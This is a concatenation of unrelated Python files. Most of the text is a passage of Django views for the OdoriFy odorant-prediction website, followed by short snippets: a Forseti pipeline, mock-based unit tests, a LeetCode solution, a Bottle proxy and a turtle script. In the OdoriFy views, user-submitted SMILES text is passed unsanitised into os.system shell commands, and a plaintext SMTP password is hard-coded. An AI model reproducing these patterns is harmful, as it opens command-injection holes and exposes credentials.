                    f'{user}/m3/{a.job_name}/{i+1}/output.csv', index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": flag})
        elif a.model == 4:
            # Model 4: Odorant-OR Pair Analysis — one CSV for the whole job.
            s = f'{user}/m4/{a.job_name}/output.csv'
            data = pd.read_csv(s)
            data.rename(columns={'seq': 'Sequence'}, inplace=True)
            data.rename(columns={'smiles': 'SMILES'}, inplace=True)
            number_of_rows = len(data)
            display = []
            for i in range(number_of_rows):
                b = disp4()
                b.smiles = data["SMILES"][i]
                b.prob = str(data["prob"][i])[:5]
                if b.prob == "nan":
                    # NaN prob marks molecules screened out as non-odorants.
                    b.prob = "NA"
                b.sno = i + 1
                b.seq = data["Sequence"][i]
                if data["status"][i] == 0:
                    b.status = "Non-Binding"
                elif data['status'][i] == 1:
                    b.status = "Binding"
                else:
                    b.status = data['status'][i]
                display.append(b)
            col = [i for i in range(1, len(data) + 1)]
            if "S.No" not in data:
                data.insert(0, 'S.No', col)
            data.to_csv(s, index=False)
            return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": flag})
def odor(request):
    """Odorant Predictor (model 1) endpoint.

    GET renders the input form; POST runs the prediction pipeline on the
    submitted SMILES list (capped at 25), stores per-molecule outputs under
    the user's m1 directory, optionally e-mails a zip of the results, and
    answers JSON {'code': 1} on success / {'code': 0} on failure.
    """
    if "GET" == request.method:
        os.chdir(root)
        check_user(request)
        return render(request, "olfy/Ahuja labs website/odor.html")
    else:
        try:
            os.chdir(root)
            a = result()
            id = check_user(request)
            a.id = id
            userm1 = f"olfy/static/olfy/generated/{id}/m1"
            job_name = request.POST["job_name"]
            if len(job_name) == 0:
                job_name = "untitled"
            smiles = request.POST["smiles"]
            email = request.POST["email"]
            # One SMILES per line; drop blank lines.
            s = smiles.replace('\r', "").split('\n')
            while "" in s:
                s.remove("")
            temp = {"smiles": s}
            data = pd.DataFrame(temp)
            data = data.head(25)  # hard cap of 25 molecules per job
            count = 1
            # Deduplicate the job name by appending "1" until unused.
            while os.path.isdir(f"{userm1}/{job_name}"):
                job_name = f"{job_name}1"
            os.mkdir(f"{userm1}/{job_name}")
            a.job_name = job_name
            job_name = f"{userm1}/{job_name}"
            path = os.path.abspath(job_name)
            data.to_csv(f"{path}/input.csv", index=False)
            a.model = 1
            os.chdir("olfy/static/olfy/generated/m1")
            shutil.copyfile("model56.tar", f'{path}/model56.tar')
            os.system(f"python transformer-cnn.py {path}")
            f = pd.read_csv(f"{path}/input.csv")
            smiles = f["smiles"]
            # Per-molecule interpretability artefacts (lrp.pdf, mol.svg).
            for i in smiles:
                smile_path = f"{path}/{count}"
                os.makedirs(smile_path)
                cmd = f"python ochem.py detectodor.pickle " + \
                    f'"{i}" ' f"{smile_path}"
                os.system(cmd)
                os.system(f"gnuplot " + f'"{path}/map.txt"')
                count += 1
            os.system(f"python generate_table.py {path}")
            # Clean up intermediate artefacts before recording the result.
            os.remove(f"{path}/map.txt")
            os.remove(f"{path}/model56.tar")
            os.remove(f"{path}/results.csv")
            os.remove(f"{path}/input.csv")
            a.count = count - 1
            os.chdir("../")
            writeresult(a, id)
            os.chdir("../../../../")
            if len(email) != 0:
                send_attachment(a, email, request)
            return JsonResponse({'code': 1})
        except Exception as e:
            traceback.print_exc()
            os.chdir(root)  # restore CWD after a mid-pipeline failure
            return JsonResponse({'code': 0})
# def getEmail(request):
# if "POST" == request.method:
# os.chdir(root)
# return JsonResponse({'code': 1})
# # registerEmail(request.POST['email'])
def odor_Or(request):
    """Odorant-OR Pair Analysis (model 4) endpoint.

    GET renders the form. POST takes paired SMILES and FASTA input, first
    screens the molecules for odorancy (model 1 pipeline), then runs the
    pair-binding model (M4_final.py) on the odorant subset only, merges
    both result sets into one output.csv, optionally e-mails a zip, and
    returns JSON {'code': 1} on success / {'code': 0} on failure.
    """
    if "GET" == request.method:
        os.chdir(root)
        check_user(request)
        return render(request, "olfy/Ahuja labs website/odorOR.html")
    else:
        try:
            os.chdir(root)
            a = result()
            job_name = request.POST["job_name"]
            if len(job_name) == 0:
                job_name = "untitled"
            smiles = request.POST["smiles"]
            fasta = request.POST["fasta"]
            email = request.POST["email"]
            id = check_user(request)
            a.id = id
            # One SMILES per line; drop blanks.
            s = smiles.replace('\r', "").split('\n')
            while "" in s:
                s.remove("")
            # FASTA is expected as alternating ">header" / sequence lines.
            t = fasta.replace('\r', "").split('\n')
            while "" in t:
                t.remove("")
            seq = []
            header = []
            for i in range(0, len(t), 2):
                header.append(t[i][1:].strip())  # strip the leading ">"
                seq.append(t[i + 1].strip())
            userm4 = f"olfy/static/olfy/generated/{id}/m4"
            temp = {"smiles": s, "seq": seq, "header": header}
            data = pd.DataFrame(temp)
            data = data.head(25)  # hard cap of 25 pairs per job
            # Deduplicate the job name by appending "1" until unused.
            while os.path.isdir(f"{userm4}/{job_name}"):
                job_name = f"{job_name}1"
            a.job_name = job_name
            job_name = f"{userm4}/{job_name}"
            os.mkdir(job_name)
            path = os.path.abspath(job_name)
            os.chdir("olfy/static/olfy/generated/m4")
            data1 = pd.DataFrame({"smiles": s})
            data1.to_csv(f"{path}/input1.csv", index=False)
            shutil.copyfile("model56.tar", f'{path}/model56.tar')
            # Stage 1: odorant screening of the molecules.
            os.system(f"python transformer-cnn.py {path}")
            os.system(f"python generate_table.py {path}")
            data2 = pd.read_csv(f"{path}/predicted_output.csv")
            # Placeholder row 0 lets the index.max()+1 appends start at 1;
            # it is dropped again before saving.
            resultdf = pd.DataFrame(
                columns=['smiles', 'seq', 'status', 'prob', "odorant"])
            resultdf.loc[0] = ["", "", "", "", ""]
            other = []
            for i in range(len(data2)):
                if data2["pred_odor"][i] == 1.0:
                    resultdf.loc[resultdf.index.max() + 1] = [data["smiles"][i], data["seq"][i], "NA", "NA", "1"]
                else:
                    resultdf.loc[resultdf.index.max() + 1] = [data["smiles"][i], data["seq"][i], "Non-Odorant", "NA", "0"]
            # Stage 2: run the pair model only on the odorant subset.
            resultdf[resultdf["odorant"] == "1"].to_csv(
                f"{path}/input.csv", index=False)
            os.system(f"python M4_final.py {path}")
            a.model = 4
            data = pd.read_csv(f"{path}/output.csv")
            count = 0
            # Merge the stage-2 predictions back into the full table.
            # NOTE(review): chained assignment (df[col][i] = ...) depends on
            # pandas returning a view here — fragile; confirm before
            # upgrading pandas.
            for i in range(len(resultdf)):
                if resultdf["odorant"][i] == "1":
                    resultdf["prob"][i] = data["prob"][count]
                    resultdf["status"][i] = data["status"][count]
                    count += 1
            resultdf.drop("odorant", axis=1, inplace=True)
            resultdf.drop(0, inplace=True)  # remove the placeholder row
            resultdf["header"] = header
            resultdf.to_csv(f"{path}/output.csv", index=False)
            # Clean up intermediates.
            os.remove(f"{path}/input.csv")
            os.remove(f"{path}/input1.csv")
            os.remove(f"{path}/model56.tar")
            os.remove(f"{path}/predicted_output.csv")
            os.remove(f"{path}/results.csv")
            a.count = len(resultdf)
            os.chdir("../")
            writeresult(a, id)
            for i in range(4):
                os.chdir("../")
            if len(email) != 0:
                send_attachment(a, email, request)
            return JsonResponse({'code': 1})
        except Exception as e:
            os.chdir(root)
            traceback.print_exc()
            return JsonResponse({'code': 0})
def Or(request):
    """Odor Finder (model 3) endpoint.

    GET renders the form. POST parses the submitted FASTA into
    header/sequence pairs, runs M3.py once per sequence (top-k controlled
    by normal_counter), stamps each per-sequence output.csv with its
    source sequence and header, optionally e-mails a zip, and returns JSON
    {'code': 1} on success / {'code': 0} on failure.
    """
    if "GET" == request.method:
        os.chdir(root)
        check_user(request)
        return render(request, "olfy/Ahuja labs website/or.html")
    else:
        try:
            os.chdir(root)
            a = result()
            id = check_user(request)
            a.id = id
            job_name = request.POST["job_name"]
            if len(job_name) == 0:
                job_name = "untitled"
            fasta = request.POST["fasta"]
            email = request.POST["email"]
            counter = request.POST["normal_counter"]
            # Split multi-record FASTA on ">" and flatten each record into
            # [">header", "sequence"] pairs (sequence may span lines).
            fasta = fasta.split('>')
            fasta.pop(0)  # text before the first ">" is empty
            t = []
            for seq in fasta:
                for i in range(len(seq)):
                    if(seq[i] == '\n'):
                        break
                t.append('>' + seq[:i])
                t.append(seq[i + 1:].replace("\n", ""))
            # t = fasta.replace('\r',"").split('\n')
            # while "" in t:
            # t.remove("")
            seq = []
            header = []
            for i in range(0, len(t), 2):
                header.append(t[i][1:].strip())
                seq.append(t[i + 1].strip())
            temp = {"seq": seq, "header": header}
            data = pd.DataFrame(temp)
            # Deduplicate the job name by appending "1" until unused.
            while os.path.isdir(f"olfy/static/olfy/generated/{id}/m3/{job_name}"):
                job_name = f"{job_name}1"
            a.job_name = job_name
            job_name = f"olfy/static/olfy/generated/{id}/m3/{job_name}"
            os.mkdir(job_name)
            path = os.path.abspath(job_name)
            data = data.head(25)  # hard cap of 25 sequences per job
            data.to_csv(f"{path}/input.csv", index=False)
            a.model = 3
            f = pd.read_csv(f"{path}/input.csv")
            os.chdir('olfy/static/olfy/generated/m3')
            a.count = len(f["seq"])
            for i in range(len(f["seq"])):
                dic = {"seq": [f["seq"][i]], "k": int(counter)}
                df = pd.DataFrame(dic)
                os.makedirs(f"{path}/{i+1}")
                df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
                os.system(f"python M3.py {path}/{i+1}")
                os.remove(f"{path}/{i+1}/temp.csv")
                # Stamp every predicted row with its source sequence/header.
                df = pd.read_csv(f"{path}/{i+1}/output.csv")
                j = []
                for k in range(len(df["Probability"])):
                    j.append(f["seq"][i])
                df["seq"] = j
                j = []
                for k in range(len(df["Probability"])):
                    j.append(f["header"][i])
                df["header"] = j
                df.to_csv(f"{path}/{i+1}/output.csv", index=False)
            os.remove(f"{path}/input.csv")
            os.chdir("../")
            writeresult(a, id)
            for i in range(4):
                os.chdir("../")
            if len(email) != 0:
                send_attachment(a, email, request)
            return JsonResponse({'code': 1})
        except Exception as e:
            traceback.print_exc()
            os.chdir(root)
            return JsonResponse({'code': 0})
def odor2(request):
    """OR Finder (model 2) endpoint.

    GET renders the form. POST runs, per submitted SMILES, either the
    threshold-based M2.py ("Rapid" mode, also the fallback for unknown
    modes) or the top-k M2-brute-force.py ("Normal" mode), stamps each
    output.csv with its source SMILES, optionally e-mails a zip, and
    returns JSON {'code': 1} on success / {'code': 0} on failure.
    """
    if "GET" == request.method:
        os.chdir(root)
        check_user(request)
        return render(request, "olfy/Ahuja labs website/odor2.html")
    else:
        try:
            os.chdir(root)
            a = result()
            id = check_user(request)
            a.id = id
            job_name = request.POST["job_name"]
            if len(job_name) == 0:
                job_name = "untitled"
            smiles = request.POST["smiles"]
            email = request.POST["email"]
            slider = request.POST["slider_value"]
            counter = request.POST["normal_counter"]
            switch = request.POST["typeOfTesting"]  # "Rapid" or "Normal"
            # One SMILES per line; drop blanks.
            t = smiles.replace('\r', "").split('\n')
            while "" in t:
                t.remove("")
            temp = {"smiles": t}
            data = pd.DataFrame(temp)
            data = data.head(25)  # hard cap of 25 molecules per job
            a.model = 2
            userm2 = f"olfy/static/olfy/generated/{id}/m2"
            # Deduplicate the job name by appending "1" until unused.
            while os.path.isdir(f"{userm2}/{job_name}"):
                job_name = f"{job_name}1"
            a.job_name = job_name
            job_name = f"{userm2}/{job_name}"
            path = os.path.abspath(job_name)
            os.mkdir(job_name)
            data.to_csv(f"{path}/input.csv", index=False)
            os.chdir("olfy/static/olfy/generated/m2")
            f = pd.read_csv(f"{path}/input.csv")
            a.count = len(f["smiles"])
            for i in range(len(f["smiles"])):
                if switch == "Rapid":
                    dic = {"smiles": [f["smiles"][i]],
                           "threshhold": float(slider)}
                    df = pd.DataFrame(dic)
                    os.makedirs(f"{path}/{i+1}")
                    df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
                    os.system(f"python M2.py {path}/{i+1}")
                    os.remove(f"{path}/{i+1}/temp.csv")
                elif switch == "Normal":
                    dic = {"smiles": [f["smiles"][i]], "k": int(counter)}
                    df = pd.DataFrame(dic)
                    os.makedirs(f"{path}/{i+1}")
                    df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
                    os.system(f"python M2-brute-force.py {path}/{i+1}")
                    os.remove(f"{path}/{i+1}/temp.csv")
                else:
                    # Unknown mode: fall back to the threshold-based run.
                    dic = {"smiles": [f["smiles"][i]],
                           "threshhold": float(slider)}
                    df = pd.DataFrame(dic)
                    os.makedirs(f"{path}/{i+1}")
                    df.to_csv(f"{path}/{i+1}/temp.csv", index=False)
                    os.system(f"python M2.py {path}/{i+1}")
                    os.remove(f"{path}/{i+1}/temp.csv")
                # Stamp every predicted row with its source SMILES.
                df = pd.read_csv(f"{path}/{i+1}/output.csv")
                j = []
                for k in range(len(df["Probability"])):
                    j.append(f["smiles"][i])
                df["smiles"] = j
                df.to_csv(f"{path}/{i+1}/output.csv", index=False)
            os.remove(f"{path}/input.csv")
            os.chdir("../")
            writeresult(a, id)
            for i in range(4):
                os.chdir("../")
            if len(email) != 0:
                send_attachment(a, email, request)
            return JsonResponse({'code': 1})
        except Exception as e:
            traceback.print_exc()
            os.chdir(root)
            return JsonResponse({'code': 0})
@minified_response
def contactus(request):
    """Contact form: GET renders the page, POST e-mails the query.

    POST forwards the user's message to the site inbox and sends an
    acknowledgement back to the submitter. Returns JSON {'code': 1} on
    success, {'code': 0} on any failure.
    """
    if "GET" == request.method:
        os.chdir(root)
        check_user(request)
        return render(request, "olfy/Ahuja labs website/contact.html")
    else:
        try:
            os.chdir(root)
            email = request.POST["email"]
            subject = request.POST["title"]
            message = request.POST["message"]
            nameUser = request.POST["name"]
            # SECURITY: SMTP credentials are hard-coded here (and in
            # send_attachment); they should live in settings/env vars.
            sender = "odorify.ahujalab@iiitd.ac.in"
            # Mail 1: the query itself, delivered to the site inbox.
            msg = MIMEMultipart()
            msg['From'] = sender
            msg['To'] = sender
            msg['Subject'] = subject
            msg.attach(MIMEText(message, 'plain'))
            text = msg.as_string()
            s = smtplib.SMTP('smtp.gmail.com', 587)
            s.starttls()
            s.login(sender, "odorify123")
            s.sendmail(sender, sender, text)
            # Mail 2: acknowledgement back to the submitter.
            msg = MIMEMultipart()
            msg['From'] = sender
            msg['To'] = email
            msg['Subject'] = f"Odorify Query: {subject}"
            message = f"Hi {nameUser},\nWe appreciate your interest in OdoriFy. We've received your query and we'll get back to you with a (human) response as soon as possible.\n\nCheers,\nOdoriFy Bot"
            msg.attach(MIMEText(message, 'plain'))
            text = msg.as_string()
            s.sendmail(sender, email, text)
            s.quit()
            return JsonResponse({'code': 1})
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt and hid all errors silently.
            traceback.print_exc()
            return JsonResponse({'code': 0})
def queue(request):
    """List the user's past jobs plus the four precomputed example jobs.

    Both result.txt files hold 4-line records: job_name, count, model,
    and a trailing id line that is skipped.
    """
    # Single source of truth for model number -> display name (the
    # original duplicated this if/elif chain twice).
    model_names = {
        '1': "Odorant Predictor",
        '2': "OR Finder",
        '3': "Odor Finder",
        '4': "Odorant-OR Pair Analysis",
    }
    if "GET" == request.method:
        os.chdir(root)
        id = check_user(request)
        precomputed = []
        # BUG FIX: the user's result file was opened without ever being
        # closed (the handle was immediately shadowed); use a context
        # manager.
        with open(f"olfy/static/olfy/generated/{id}/result.txt") as f:
            data = f.read().splitlines()
        length = len(data)
        queue = []
        count = 0
        # The user's own jobs, newest records appended last.
        for i in range(0, length, 4):
            temp = queuedisp()
            temp.count = data[i + 1]
            temp.job_name = data[i]
            temp.sno = count + 1
            temp.model = data[i + 2]
            name = model_names.get(temp.model)
            if name is not None:
                temp.model_name = name
            queue.append(temp)
            count += 1
        # Exactly four shared precomputed example jobs, same record format.
        with open(f"olfy/static/olfy/generated/precomputed/result.txt", 'r') as f:
            for i in range(4):
                temp = queuedisp()
                temp.sno = count + 1
                temp.job_name = (f.readline().replace("\n", ""))
                temp.count = (f.readline().replace("\n", ""))
                temp.model = (f.readline().replace("\n", ""))
                name = model_names.get(temp.model)
                if name is not None:
                    temp.model_name = name
                precomputed.append(temp)
                f.readline()  # skip the record's trailing id line
                count += 1
        return render(request, "olfy/Ahuja labs website/queue.html", {"queue": queue, "precomputed": precomputed})
def makezip(a, request, flag="0"):
    """Bundle the Odorant Predictor (model 1) outputs for job `a` into a zip.

    Collects per-molecule lrp.pdf/mol.svg plus the job-level
    predicted_output.csv, writes data.zip in the job directory, and
    returns an open "rb" handle to it (the caller closes it). Walks six
    directory levels back up to restore the CWD, mirroring the other
    makezip helpers.
    """
    os.chdir(root)
    if flag == "1":
        id = "precomputed"  # shared precomputed example results
    else:
        id = check_user(request)
    file_path = []
    os.chdir(f"olfy/static/olfy/generated/{id}/m1")
    for i in range(a.count):
        file_path.append(f"{a.job_name}/{i+1}/lrp.pdf")
        file_path.append(f"{a.job_name}/{i+1}/mol.svg")
    file_path.append(f"{a.job_name}/predicted_output.csv")
    # IDIOM FIX: context-managed ZipFile, and no shadowing of the `zip`
    # builtin as the original did.
    with ZipFile(f"{a.job_name}/data.zip", 'w') as archive:
        for file in file_path:
            archive.write(file)
    zip_handle = open(f"{a.job_name}/data.zip", "rb")
    for i in range(6):
        os.chdir("../")
    return zip_handle
def makezip2(a, request, flag="0"):
    """Bundle the OR Finder (model 2) outputs for job `a` into a zip.

    For each input molecule, collects the per-prediction interpretability
    PDFs/SVG (unless the output is the "Empty" no-result sentinel) plus
    that molecule's output.csv. Returns an open "rb" handle to the
    created data.zip; the caller closes it.
    """
    os.chdir(root)
    if flag == "1":
        id = "precomputed"  # shared precomputed example results
    else:
        id = check_user(request)
    file_path = []
    os.chdir(f"olfy/static/olfy/generated/{id}/m2")
    for i in range(a.count):
        f = pd.read_csv(f"{a.job_name}/{i+1}/output.csv")
        count = len(f)
        for j in range(count):
            # NOTE(review): row 0's Probability is checked for every j —
            # presumably "Empty" in the first row marks "no results at
            # all"; confirm this shouldn't be f["Probability"][j].
            if "Empty" != f["Probability"][0]:
                file_path.append(
                    f"{a.job_name}/{i+1}/{j+1}_SmileInterpretability.pdf")
                file_path.append(
                    f"{a.job_name}/{i+1}/{j+1}_SequenceInterpretability.pdf")
                file_path.append(f"{a.job_name}/{i+1}/{j+1}_mol.svg")
        file_path.append(f"{a.job_name}/{i+1}/output.csv")
    # IDIOM FIX: context-managed ZipFile; no shadowing of the `zip` builtin.
    with ZipFile(f"{a.job_name}/data.zip", 'w') as archive:
        for file in file_path:
            archive.write(file)
    zip_handle = open(f"{a.job_name}/data.zip", "rb")
    for i in range(6):
        os.chdir("../")
    return zip_handle
def makezip3(a, request, flag="0"):
    """Bundle the Odor Finder (model 3) outputs for job `a` into a zip.

    Identical layout to makezip2, but rooted in the m3 directory. Returns
    an open "rb" handle to the created data.zip; the caller closes it.
    """
    os.chdir(root)
    if flag == "1":
        id = "precomputed"  # shared precomputed example results
    else:
        id = check_user(request)
    file_path = []
    os.chdir(f"olfy/static/olfy/generated/{id}/m3")
    for i in range(a.count):
        f = pd.read_csv(f"{a.job_name}/{i+1}/output.csv")
        count = len(f)
        for j in range(count):
            # NOTE(review): row 0's Probability is checked for every j —
            # presumably "Empty" in the first row marks "no results at
            # all"; confirm this shouldn't be f["Probability"][j].
            if "Empty" != f["Probability"][0]:
                file_path.append(
                    f"{a.job_name}/{i+1}/{j+1}_SmileInterpretability.pdf")
                file_path.append(
                    f"{a.job_name}/{i+1}/{j+1}_SequenceInterpretability.pdf")
                file_path.append(f"{a.job_name}/{i+1}/{j+1}_mol.svg")
        file_path.append(f"{a.job_name}/{i+1}/output.csv")
    # IDIOM FIX: context-managed ZipFile; no shadowing of the `zip` builtin.
    with ZipFile(f"{a.job_name}/data.zip", 'w') as archive:
        for file in file_path:
            archive.write(file)
    zip_handle = open(f"{a.job_name}/data.zip", "rb")
    for i in range(6):
        os.chdir("../")
    return zip_handle
def makezip4(a, request, flag="0"):
    """Bundle the Odorant-OR Pair Analysis (model 4) outputs into a zip.

    Rows whose prob is NaN were screened out as non-odorants and produced
    no interpretability files, so they are skipped; `count` tracks the
    index of files that were actually generated. Returns an open "rb"
    handle to the created data.zip; the caller closes it.
    """
    os.chdir(root)
    if flag == "1":
        id = "precomputed"  # shared precomputed example results
    else:
        id = check_user(request)
    file_path = []
    os.chdir(f"olfy/static/olfy/generated/{id}/m4")
    f = pd.read_csv(f"{a.job_name}/output.csv")
    count = 0
    for i in range(a.count):
        # IDIOM FIX: dropped the redundant `else: continue`.
        if not str(f["prob"][i]) == "nan":
            file_path.append(f"{a.job_name}/{count+1}_SmileInterpretability.pdf")
            file_path.append(
                f"{a.job_name}/{count+1}_SequenceInterpretability.pdf")
            file_path.append(f"{a.job_name}/{count+1}_mol.svg")
            count += 1
    file_path.append(f"{a.job_name}/output.csv")
    # Removed leftover debug print(file_path).
    # IDIOM FIX: context-managed ZipFile; no shadowing of the `zip` builtin.
    with ZipFile(f"{a.job_name}/data.zip", 'w') as archive:
        for file in file_path:
            archive.write(file)
    zip_handle = open(f"{a.job_name}/data.zip", "rb")
    for i in range(6):
        os.chdir("../")
    return zip_handle
def download(request, job_name, model, count, flag):
    """Stream the zipped results of a finished job as a file attachment.

    Dispatches to the per-model makezip helper; unknown model numbers
    yield an empty response body, matching the original behaviour.
    """
    os.chdir(root)
    a = result()
    a.job_name = job_name
    a.model = int(model)
    a.count = int(count)
    # Dispatch table instead of the original repeated `if` chain.
    builders = {1: makezip, 2: makezip2, 3: makezip3, 4: makezip4}
    zip = ''
    builder = builders.get(a.model)
    if builder is not None:
        zip = builder(a, request, flag)
    response = HttpResponse(zip, content_type='application/zip')
    response['Content-Disposition'] = 'attachment; filename=data.zip'
    return response
def send_attachment(a, email, request):
    """E-mail the zipped results for job `a` to `email` as an attachment."""
    os.chdir(root)
    attachment = ""
    sender = "odorify.ahujalab@iiitd.ac.in"
    # CONSISTENCY FIX: pass the flag as the string "0" — the makezip
    # helpers compare against the strings "1"/"0"; the int 0 only worked
    # by accident of the comparison being False.
    if a.model == 1:
        attachment = makezip(a, request, "0")
    if a.model == 2:
        attachment = makezip2(a, request, "0")
    if a.model == 3:
        attachment = makezip3(a, request, "0")
    if a.model == 4:
        attachment = makezip4(a, request, "0")
    msg = MIMEMultipart()
    msg['From'] = sender
    msg['To'] = email
    msg['Subject'] = "Results"
    filename = "data.zip"
    p = MIMEBase('application', 'octet-stream')
    p.set_payload((attachment).read())
    attachment.close()  # BUG FIX: the zip file handle was never closed
    encoders.encode_base64(p)
    p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
    msg.attach(p)
    message = "Dear User,\n Thank you for using OdoriFy.\n Please find attached your combined results in a zip file. In case of any queries, please contact us at the following link: http://odorify.ahujalab.iiitd.edu.in/olfy/contact"
    msg.attach(MIMEText(message, 'plain'))
    text = msg.as_string()
    # SECURITY: hard-coded SMTP credentials; move to configuration.
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    s.login(sender, "odorify123")
    s.sendmail(sender, email, text)
    s.quit()
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline to load organizations data into Inventory."""
from google.cloud.security.common.util import log_util
from google.cloud.security.common.util import parser
from google.cloud.security.inventory.pipelines import base_pipeline
LOGGER = log_util.get_logger(__name__)
class LoadOrgsPipeline(base_pipeline.BasePipeline):
    """Pipeline to load org IAM policies data into Inventory."""

    RESOURCE_NAME = 'organizations'

    def _transform(self, resource_from_api):
        """Yield an iterator of loadable organizations.

        Args:
            resource_from_api (list): Resource manager org search
                response.
            https://cloud.google.com/resource-manager/reference/rest/v1/organizations/search
            https://cloud.google.com/resource-manager/reference/rest/v1/organizations#Organization

        Yields:
            iterable: Loadable orgs, each org as a dict.
        """
        # "name" is "organizations/<organization_id>"; strip the resource
        # prefix once instead of recomputing it per org.
        prefix_length = len('%s/' % self.RESOURCE_NAME)
        for org in resource_from_api:
            org_name = org.get('name')
            yield {
                'org_id': org_name[prefix_length:],
                'name': org_name,
                'display_name': org.get('displayName'),
                'lifecycle_state': org.get('lifecycleState'),
                'raw_org': parser.json_stringify(org),
                'creation_time': parser.format_timestamp(
                    org.get('creationTime'),
                    self.MYSQL_DATETIME_FORMAT),
            }

    def _retrieve(self):
        """Retrieve the organizations resources from GCP.

        Returns:
            iterable: resource manager org search response.
            https://cloud.google.com/resource-manager/reference/rest/v1/organizations/search
        """
        return self.safe_api_call('get_organizations', self.RESOURCE_NAME)

    def run(self):
        """Runs the data pipeline."""
        orgs_map = self._retrieve()
        if not orgs_map:
            return
        self._load(self.RESOURCE_NAME, self._transform(orgs_map))
        self._get_loaded_count()
|
"""
Unit tests
"""
import unittest
from mock import patch
from utils import proxy_request
def mocked_config_requests(**kwargs):
    """
    Mocks config endpoints: 200 for well-formed commands, 404 otherwise.
    """
    command = kwargs.get('command')
    # agencyList needs no agency; routeList/routeConfig require 'a'
    # (the optional 'r' route parameter does not change the outcome).
    if command == 'agencyList':
        return 200
    if command in ('routeList', 'routeConfig') and 'a' in kwargs:
        return 200
    return 404
def mocked_message_requests(**kwargs):
    """
    Mocks message endpoints: 200 for well-formed commands, 404 otherwise.
    """
    command = kwargs.get('command')
    has_agency = 'a' in kwargs
    # messages and vehicleLocations need an agency; routeConfig also
    # needs a stop tag 't' (the optional 'r' does not change the outcome).
    if has_agency and command in ('messages', 'vehicleLocations'):
        return 200
    if has_agency and command == 'routeConfig' and 't' in kwargs:
        return 200
    return 404
class MyTest(unittest.TestCase):
    """
    Unit tests for proxy_request and the mocked endpoint helpers.
    """
    @patch('utils.requests.get')
    def test_request_response(self, mock_get):
        """
        Test request response of API call
        """
        # NOTE(review): indexing the MagicMock return value auto-creates
        # attributes, so both sides of the assert come from the same mock
        # object — this mainly verifies that proxy_request returns the
        # mocked response unchanged; confirm intent.
        mock_get.return_value[0].status = '200 OK'
        resp = proxy_request('http://localhost/api/v1/config?command=agencyList')
        self.assertEqual(mock_get.return_value[0].status, resp[0].status)
    @patch('config.config', side_effect=mocked_config_requests)
    def test_config_response(self, mock_get):
        """
        Test that incorrect endpoint returns an error
        """
        # Valid config commands should report 200.
        mock_get.return_value = 200
        self.assertEqual(mocked_config_requests(command='agencyList'), mock_get.return_value)
        self.assertEqual(mocked_config_requests(command='routeList', a='sf-muni'), mock_get.return_value)
        self.assertEqual(mocked_config_requests(command='routeConfig', a='sf-muni'), mock_get.return_value)
        self.assertEqual(mocked_config_requests(command='routeConfig', a='sf-muni', r='N'), mock_get.return_value)
        # Commands missing the required agency ('a') should report 404.
        mock_get.return_value = 404
        self.assertEqual(mocked_config_requests(command='routeList'), mock_get.return_value)
        self.assertEqual(mocked_config_requests(command='routeConfig', r='N'), mock_get.return_value)
    @patch('message.message', side_effect=mocked_message_requests)
    def test_message_response(self, mock_get):
        """
        Test that incorrect endpoint returns an error
        """
        # Valid message commands should report 200.
        mock_get.return_value = 200
        self.assertEqual(mocked_message_requests(command='messages', a='sf-muni'), mock_get.return_value)
        self.assertEqual(mocked_message_requests(command='messages', a='sf-muni', r='N'), mock_get.return_value)
        # Missing agency ('a') should report 404.
        mock_get.return_value = 404
        self.assertEqual(mocked_message_requests(command='messages', r='N'), mock_get.return_value)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
# Given a positive integer num consisting only of digits 6 and 9.
#
# Return the maximum number you can get by changing at most
# one digit (6 becomes 9, and 9 becomes 6).
class Solution:
    def maximum69Number(self, num):
        """Return the largest number obtainable from `num` by flipping at
        most one digit 6 into a 9 (flipping a 9 to 6 never helps)."""
        digits = str(num)
        # The best single flip is always the most significant '6'.
        first_six = digits.find('6')
        if first_six == -1:
            return num
        return int(digits[:first_six] + '9' + digits[first_six + 1:])
# Ad-hoc manual check; note the method is invoked unbound, passing the
# class itself as `self` (works because `self` is never used).
if __name__ == '__main__':
    test_input = 969669
    print(Solution.maximum69Number(Solution, test_input))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import bottle
import requests
# NOTE: Python 2 source (print statement and `except ..., err` syntax).
# Two-tier demo: this "web" front-end proxies the "app" tier over HTTP.
app = '10.33.39.200'  # upstream application server address
web = '10.33.39.200'  # this web front-end's own address
@bottle.route('/')
def index():
    """Fetch the app tier's front page and render both tiers' status."""
    ret = ''
    try:
        r = requests.get("http://%s:8080/" % app)
        print r.text
        ret = r.text
    except requests.exceptions.RequestException, err:
        # On any HTTP failure, show the error object in place of content.
        ret = err
    return '<h1>Web: %s</h1></br><h2>App: %s, Content: %s</h2>' % (
        web, app, ret)
if __name__ == '__main__':
    # reloader=True restarts the server on source changes (dev mode).
    bottle.run(host='0.0.0.0', port=80, reloader=True)
|
import turtle
# Draw a path with the turtle: one 100px step per list element, turning
# right after an even value and left after an odd one.
my_window = turtle.Screen()
my_pen=turtle.Turtle()
# NOTE(review): looks like a list of primes, but 29 is missing — confirm
# whether that is intentional.
a=[2,3,5,7,11,13,17,19,23,31,37,41,43,47]
for i in a:
    # Only 2 is even, so the right turn happens exactly once.
    if(i%2==0):
        my_pen.forward(100)
        my_pen.right(90)
    else:
        my_pen.forward(100)
        my_pen.left(90)
|
# coding=utf8
from lib.opener import Opener
import re, sys
if __name__ == '__main__':
    # Scrape one company's registration record from the Guangzhou AIC WAP
    # site: fetch the ASP.NET __ufps token, POST the search form, extract
    # the corp id, then parse the detail page with a regex.
